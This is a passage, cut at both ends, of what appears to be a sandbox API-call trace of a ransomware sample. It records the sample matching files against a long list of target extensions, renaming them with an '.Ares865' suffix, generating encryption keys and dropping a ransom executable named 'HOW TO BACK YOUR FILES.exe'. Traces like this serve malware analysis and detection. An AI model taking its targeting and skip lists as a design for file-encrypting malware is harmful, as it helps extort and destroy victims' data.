returned -1 [0059.962] lstrlenW (lpString="rctd") returned 4 [0059.962] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0059.962] lstrlenW (lpString="rod") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0059.962] lstrlenW (lpString="rodx") returned 4 [0059.962] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0059.962] lstrlenW (lpString="rpd") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0059.962] lstrlenW (lpString="rsd") returned 3 [0059.962] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0059.962] lstrlenW (lpString="sas7bdat") returned 8 [0059.962] lstrcmpiW (lpString1="tions-ms", lpString2="sas7bdat") returned 1 [0059.963] lstrlenW (lpString="sbf") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0059.963] lstrlenW (lpString="scx") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0059.963] lstrlenW (lpString="sdb") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0059.963] lstrlenW (lpString="sdc") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0059.963] lstrlenW (lpString="sdf") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0059.963] lstrlenW (lpString="sis") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0059.963] lstrlenW (lpString="spq") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0059.963] lstrlenW (lpString="te") returned 2 [0059.963] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0059.963] lstrlenW (lpString="teacher") returned 7 [0059.963] lstrcmpiW (lpString1="ions-ms", lpString2="teacher") returned -1 [0059.963] lstrlenW (lpString="tmd") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0059.963] lstrlenW (lpString="tps") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0059.963] lstrlenW (lpString="trc") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.963] lstrlenW (lpString="trc") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.963] lstrlenW (lpString="trm") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0059.963] lstrlenW (lpString="udb") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0059.963] lstrlenW (lpString="udl") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0059.963] lstrlenW (lpString="usr") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0059.963] lstrlenW (lpString="v12") returned 3 [0059.963] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0059.963] lstrlenW (lpString="vis") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0059.964] lstrlenW (lpString="vpd") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0059.964] lstrlenW (lpString="vvv") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0059.964] lstrlenW (lpString="wdb") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0059.964] lstrlenW (lpString="wmdb") returned 4 [0059.964] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0059.964] lstrlenW (lpString="wrk") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0059.964] lstrlenW (lpString="xdb") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0059.964] lstrlenW (lpString="xld") returned 3 [0059.964] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0059.964] lstrlenW (lpString="xmlff") returned 5 [0059.964] lstrcmpiW (lpString1="ns-ms", lpString2="xmlff") returned -1 [0059.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865") returned 94 [0059.964] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default user\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), lpNewFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0059.965] CreateFileW (lpFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0059.965] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0059.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0059.965] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0059.966] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.966] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.966] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x320, lpName=0x0) returned 0x164 [0059.974] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x320) returned 0x190000 [0059.975] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0059.976] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.976] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.976] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.976] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.977] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.977] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.977] CloseHandle (hObject=0x164) returned 1 [0059.977] CloseHandle (hObject=0x15c) returned 1 [0060.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0060.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.032] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ea2ca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.032] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.032] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ea2ca0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.032] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.033] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2288 [0060.033] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Recent\\AutomaticDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Users\\Default User\\Recent\\AutomaticDestinations" [0060.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0060.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0060.033] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned 50 [0060.033] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent\\AutomaticDestinations" | out: lpString1="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Users\\Default User\\Recent\\AutomaticDestinations" [0060.033] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.033] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\automaticdestinations\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.033] GetLastError () returned 0x0 [0060.033] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.034] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.034] CloseHandle (hObject=0x12c) returned 1 [0060.034] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.034] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.034] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.034] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.034] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.034] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.034] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.034] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.034] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.034] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.034] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x14bb620, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="aoldtz.exe") returned -1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".") returned 1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="..") returned 1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="windows") returned -1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="bootmgr") returned -1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="temp") returned -1 [0060.034] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="pagefile.sys") returned -1 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="boot") returned -1 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="ids.txt") returned -1 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="ntuser.dat") returned -1 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="perflogs") returned -1 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2="MSBuild") returned -1 [0060.035] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0060.035] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\*") returned 52 [0060.035] lstrcpyW (in: lpString1=0x2cce466, lpString2="1b4dd67f29cb1962.automaticDestinations-ms" | out: lpString1="1b4dd67f29cb1962.automaticDestinations-ms") returned="1b4dd67f29cb1962.automaticDestinations-ms" [0060.035] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0060.035] lstrlenW (lpString="Ares865") returned 7 [0060.035] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0060.035] lstrlenW (lpString=".dll") returned 4 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".dll") returned 1 [0060.035] lstrlenW (lpString=".lnk") returned 4 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".lnk") returned 1 [0060.035] lstrlenW (lpString=".ini") returned 4 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".ini") returned 1 [0060.035] lstrlenW (lpString=".sys") returned 4 [0060.035] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".sys") returned 1 [0060.035] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0060.035] lstrlenW (lpString="bak") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0060.035] lstrlenW (lpString="ba_") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0060.035] lstrlenW (lpString="dbb") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0060.035] lstrlenW (lpString="vmdk") returned 4 [0060.035] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0060.035] lstrlenW (lpString="rar") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0060.035] lstrlenW (lpString="zip") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0060.035] lstrlenW (lpString="tgz") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0060.035] lstrlenW (lpString="vbox") returned 4 [0060.035] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0060.035] lstrlenW (lpString="vdi") returned 3 [0060.035] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0060.036] lstrlenW (lpString="vhd") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0060.036] lstrlenW (lpString="vhdx") returned 4 [0060.036] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0060.036] lstrlenW (lpString="avhd") returned 4 [0060.036] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0060.036] lstrlenW (lpString="db") returned 2 [0060.036] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0060.036] lstrlenW (lpString="db2") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0060.036] lstrlenW (lpString="db3") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0060.036] lstrlenW (lpString="dbf") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0060.036] lstrlenW (lpString="mdf") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0060.036] lstrlenW (lpString="mdb") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0060.036] lstrlenW (lpString="sql") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0060.036] lstrlenW (lpString="sqlite") returned 6 [0060.036] lstrcmpiW (lpString1="ons-ms", lpString2="sqlite") returned -1 [0060.036] lstrlenW (lpString="sqlite3") returned 7 [0060.036] lstrcmpiW (lpString1="ions-ms", lpString2="sqlite3") returned -1 [0060.036] lstrlenW (lpString="sqlitedb") returned 8 [0060.036] lstrcmpiW (lpString1="tions-ms", lpString2="sqlitedb") returned 1 [0060.036] lstrlenW (lpString="xml") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0060.036] lstrlenW (lpString="$er") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0060.036] lstrlenW (lpString="4dd") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0060.036] lstrlenW (lpString="4dl") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0060.036] lstrlenW (lpString="^^^") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0060.036] lstrlenW (lpString="abs") returned 3 [0060.036] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0060.037] lstrlenW (lpString="abx") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0060.037] lstrlenW (lpString="accdb") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0060.037] lstrlenW (lpString="accdc") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0060.037] lstrlenW (lpString="accde") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0060.037] lstrlenW (lpString="accdr") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0060.037] lstrlenW (lpString="accdt") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0060.037] lstrlenW (lpString="accdw") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0060.037] lstrlenW (lpString="accft") returned 5 [0060.037] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0060.037] lstrlenW (lpString="adb") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0060.037] lstrlenW (lpString="adb") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0060.037] lstrlenW (lpString="ade") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0060.037] lstrlenW (lpString="adf") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0060.037] lstrlenW (lpString="adn") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0060.037] lstrlenW (lpString="adp") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0060.037] lstrlenW (lpString="alf") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0060.037] lstrlenW (lpString="ask") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0060.037] lstrlenW (lpString="btr") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0060.037] lstrlenW (lpString="cat") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0060.037] lstrlenW (lpString="cdb") returned 3 [0060.037] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0060.038] lstrlenW (lpString="ckp") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0060.038] lstrlenW (lpString="cma") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0060.038] lstrlenW (lpString="cpd") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0060.038] lstrlenW (lpString="dacpac") returned 6 [0060.038] lstrcmpiW (lpString1="ons-ms", lpString2="dacpac") returned 1 [0060.038] lstrlenW (lpString="dad") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0060.038] lstrlenW (lpString="dadiagrams") returned 10 [0060.038] lstrcmpiW (lpString1="nations-ms", lpString2="dadiagrams") returned 1 [0060.038] lstrlenW (lpString="daschema") returned 8 [0060.038] lstrcmpiW (lpString1="tions-ms", lpString2="daschema") returned 1 [0060.038] lstrlenW (lpString="db-journal") returned 10 [0060.038] lstrcmpiW (lpString1="nations-ms", lpString2="db-journal") returned 1 [0060.038] lstrlenW (lpString="db-shm") returned 6 [0060.038] lstrcmpiW (lpString1="ons-ms", lpString2="db-shm") returned 1 [0060.038] lstrlenW (lpString="db-wal") returned 6 [0060.038] lstrcmpiW (lpString1="ons-ms", lpString2="db-wal") returned 1 [0060.038] lstrlenW (lpString="dbc") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0060.038] lstrlenW (lpString="dbs") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0060.038] lstrlenW (lpString="dbt") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0060.038] lstrlenW (lpString="dbv") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0060.038] lstrlenW (lpString="dbx") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0060.038] lstrlenW (lpString="dcb") returned 3 [0060.038] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0060.039] lstrlenW (lpString="dct") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0060.039] lstrlenW (lpString="dcx") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0060.039] lstrlenW (lpString="ddl") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0060.039] lstrlenW (lpString="dlis") returned 4 [0060.039] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0060.039] lstrlenW (lpString="dp1") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0060.039] lstrlenW (lpString="dqy") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0060.039] lstrlenW (lpString="dsk") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0060.039] lstrlenW (lpString="dsn") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0060.039] lstrlenW (lpString="dtsx") returned 4 [0060.039] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0060.039] lstrlenW (lpString="dxl") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0060.039] lstrlenW (lpString="eco") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0060.039] lstrlenW (lpString="ecx") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0060.039] lstrlenW (lpString="edb") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0060.039] lstrlenW (lpString="epim") returned 4 [0060.039] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0060.039] lstrlenW (lpString="fcd") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0060.039] lstrlenW (lpString="fdb") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0060.039] lstrlenW (lpString="fic") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0060.039] lstrlenW (lpString="flexolibrary") returned 12 [0060.039] lstrcmpiW (lpString1="tinations-ms", lpString2="flexolibrary") returned 1 [0060.039] lstrlenW (lpString="fm5") returned 3 [0060.039] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0060.040] lstrlenW (lpString="fmp") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0060.040] lstrlenW (lpString="fmp12") returned 5 [0060.040] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0060.040] lstrlenW (lpString="fmpsl") returned 5 [0060.040] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0060.040] lstrlenW (lpString="fol") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0060.040] lstrlenW (lpString="fp3") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", 